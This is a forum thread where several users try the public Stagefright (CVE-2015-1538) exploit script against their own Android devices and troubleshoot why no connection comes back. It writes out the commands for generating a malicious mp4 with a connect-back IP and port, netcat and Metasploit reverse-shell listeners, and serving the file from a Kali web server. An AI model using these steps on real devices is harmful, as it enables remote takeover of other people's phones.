
Android Stagefright CVE-2015-1538.py


0v3rl04d


Hi guys,

After the discovery of the Stagefright bug, the researcher at Zimperium has posted a Python script for the specific module CVE 1538.

I've downloaded it and tried to execute it on my Android phone with Lollipop 5.0. Before this, I downloaded the Zimperium APK to test whether my phone is vulnerable.

The app shows me, in green, the module CVE-1538 and others... After this, on my Linux PC with Python 2.7.x, I renamed the script to mp4.py to resolve an import error.

After this I tried to generate the file.mp4 with this command:

$python2 mp4.py -c [LAN IP] -p 4444

The script correctly generates a file.mp4 without an error.

Afterwards I launched a listener with:

$netcat -l -p 4444

I sent the file.mp4 to my smartphone and tried to execute it.

The terminal with netcat doesn't show anything, no result, nisba, nada... I tried with the Metasploit listener multi/handler, but with the same result.

Any solution? Thanks everyone and sorry for my English ;-P


I would assume the same thing Cooper said, that if you are in green for "CVE-1538" specifically, you are only vulnerable to the attacks that fall under the other CVEs that are listed in red. Another thing to consider is that, if you are vulnerable, maybe the listener doesn't see anything because it can't reach your machine from the phone, which may need port forwarding and such in place to see the reply from the phone.

Test that everything is working for the listener first: connect locally from another machine to your listener. If it works locally, then try from the internet, such as setting up a fake web page and then connecting over your browser.

ex:

cat sometextfile.txt | nc -l -p 4444

(Or if on Windows)

type sometextfile.txt | nc -l -p 4444

And then in your browser, connect to your local IP using http://your.local.ip/ and your internet based IP (type "ip" by itself into Google to get your external IP). You should see the output of your text file in your web browser. If that works locally and remotely, then you should see whatever the phone is supposed to send back to you. Get the listener working first, then you can test if the code works against your phone. If it doesn't send back a shell or whatever prompt it's supposed to show from the phone, then you probably aren't vulnerable.


  • 2 weeks later...

Thank you, it is a very simple and good test for netcat. I didn't know it! I've tested locally and remotely and both work well!

So probably my phone isn't vulnerable... I'll try with another phone...

People wanted me to do a video on this. The public exploit released doesn't work for my Nexus 7 2013 tablet, even though the detector claims my tablet is vulnerable. Renamed the Python script to mp4.py; that part works when making the mp4. Set my chost and set my cback port, made the mp4 called test.mp4, placed it on my Kali Apache server, started a nc -l -p 4444, went to my Kali webserver to run the mp4: nothing happens :B no connect back on netcat so :B
